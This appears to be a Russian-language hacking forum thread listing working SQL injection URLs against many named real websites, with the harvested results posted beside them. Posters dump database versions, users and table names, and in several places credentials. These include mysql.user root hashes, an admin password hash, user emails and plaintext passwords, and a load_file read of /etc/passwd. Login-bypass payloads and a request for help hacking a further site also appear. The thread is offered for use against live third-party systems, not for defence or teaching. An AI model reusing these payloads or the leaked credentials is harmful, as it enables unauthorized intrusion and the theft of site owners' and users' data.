SQL Инъекции

http://www.lyapis.com/articles.php?id=-138+union+select+1,2,DATABASE(),USER(),VERSION(),6,7,8,9/*

То что таблицы не нашёл не судить, завтра попытаюсь отыскать.

 

news
albums
articles

Code:

http://www.lyapis.com/photo.php?cl=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/albums.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*

Админка с Basic'ом

Code:

http://www.lyapis.com/admin/

P.S.: Теперь остался форум. И не исключено, что база называется lyapis_forum...

 

Code:

http://www.rabota-omsk.info/comment.php?ID=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5+from+users/*

5.0.22/jobsmarket_omsk/jobsmarket_job@localhost

 

Code:

http://www.vip-electronic.ru/index.php?productID=688+union+select+1,2,3,4/*

vipelect_vp@localhost

 

HTML:

http://www.pronline.ru/gospriemka.php?letter=-8+UNION+SELECT+1,2,3,4,5,6,7+From+phpads_clients/*

БД 4

HTML:

http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11/*

БД 5

HTML:

http://www.gallery-a.ru/expo/index.php?expo=HERZEN&room=expo&leaf=000035%20union%20select%201,name+FROM+users/*

БД 4

 

aker.com.ua - Научно-производственная компания "АКЕР"
4.1.21-standard-logaker_akeraker_aker@localhost

Code:

http://aker.com.ua/index.php?pageid=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7,8,9,10,11,12
http://aker.com.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7,8

Таблицы:
aimglib_files (id, nshows, groupid, date)
aadm_menu
anews_news
picture_amount

 

arsenal.kharkov.ua - ФК "Арсенал"
4.0.21-logarsenalarsenal@localhost

Code:

http://www.arsenal.kharkov.ua/archive.phtml?id_rubric=1&id_rubric2=-1+union+select+1,2,3,4,5,concat_ws(0x05,version(),database(),user()),7,8,9,10,11,12/*

users (id, password, email, country, city)
vote
P.S.: Столбик пользователя не нашел...

 

www.ceethree.us

 

Журнал Системный Администратор av5.com

Code:

http://av5.com/?action=jns,read,choose_issue&journalid=1&choose_year=-1+union+select+1/*

одна колонка, где выводится информация не нашел.

 

==========================================================================
Tables:

_cities
accaunts
61636361756e7473
accaunts3
61636361756e747333
===========================================================================

patronymic_name
password

===========================================================================
shnyga:shnyga
===========================================================================

 

http://www.oneway-uk.com/ Аукцион

Code:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--

4.1.15-Debian_1-logneway:root@oneway.oneway.co.nz

Code:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(user,0x3a,password),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+mysql.user+limit+0,1--

root:74e47d975f1a9f72:stiltskin
debian-sys-maint:0c1b789c7af5d9ca

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(password,0x3a,email),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+member+limit+1,1--
...
dvtamde7:[email protected]
....

Code:

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--

интересные файлы для инклуида и изучения
/var/www/protected/includes/memberarchive.inc
/var/www/protected/includes/auction.inc
/var/www/protected/includes/ledger.inc
/var/www/protected/includes/profile.inc
/var/www/protected/includes/store.inc
/var/www/protected/includes/alert.inc
/var/www/protected/includes/team.inc
/var/www/protected/includes/stats.inc

 

HTML:

http://edu.ascon.ru/order.php?id=-34+UNION+SELECT+1,2,concat(username,0x2c,userpass),4,5+FROM+poll_user/*

БД 5
admin:81dc9bdb52d04dc20036dbd8313ed055:1234

 

www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order=
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'

Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Объясните что делать дальше, можете даже снять видео про взлом этого сайта =)

 

Интернет-маркетинг и раскрутка сайтов

HTML:

http://www.vanta.ru/script/catalog.php?cat=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

БД 4
Если кто найдёт таблицы....отпишитесь

 

brahms.ro

Code:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,aes_decrypt(aes_encrypt(version(),0x71),0x71),aes_decrypt(aes_encrypt(database(),0x71),0x71),aes_decrypt(aes_encrypt(user(),0x71),0x71)),11,12,13/*

4.1.12:b2:root@localhost
А дальше нужна подсказка...
Почему-то можно посмотреть user из mysql.user:

Code:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(user,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*

но ничего не отображается в поле password:

Code:

http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(password,0x71),0x71),11,12,13+from+mysql.user+limit+1,1/*

неужели нет пароля на рута..?!

 

quickgifts.com
version: Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name: dbLogins
user: qglogin
В поле email:

Code:

1' or 1=(SELECT TOP 1 password FROM tblusers)--

email: [email protected]
password: ZHNoaWZsZXk=
Или так:
email: ' or 1=1--
password: любой


whalesdirect.com

Code:

http://www.whalesdirect.com/product.html?t_q=FT305'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),email,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+--+

4.1.20:crt@localhost:whalesdirect_com

email:[email protected]
password:h0bbes
Куда вводить не нашел

 

mdgu.com.ua - Мариупольский Государственный Гуманитарный Университет
5.0.27-standard-logmdgu2006_mdgumdgu2006_mdgu@localhost

Code:

http://www.mdgu.com.ua/ua/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x05,version(),database(),user()),6,7,8,9/*

То что нашел...
news
photogallery
rectorat
faculty
specialty
profkom
professors
administration
links_univer
links
elpublic
lang
Таблицу пользователей не нашел, а админка тут.

 

Code:

http://zvezda.ru/file.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11/*

4.1.20/zvezdaDB/webuzer@localhost

 

Code:

http://k-parts.ru/index.php?actions=yes&id=-8+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4/*

4.0.18-log:elitron9_test:elitron9_elitron@localhost

Code:

http://www.webtel.ru/spec.php?table=phones&id=-745'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user(),0x3a,database(),0x3a,version()),13,14,15,16,17/*

webtel@localhost:webtel:4.1.18

Code:

http://www.mtas.ru/second.php?ID=-29+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x3a),0x3a)/*

mtas116_site@localhost:mtas116_site:4.1.15-nt

 

donntu.edu.ua - Донецкий национальный технический университет
4.0.24-logCounter[email protected]

Code:

http://donntu.edu.ua/russian/intas/statistics/statistic.php?id=-1)+union+select+1,concat_ws(0x05,version(),database(),user()),3/*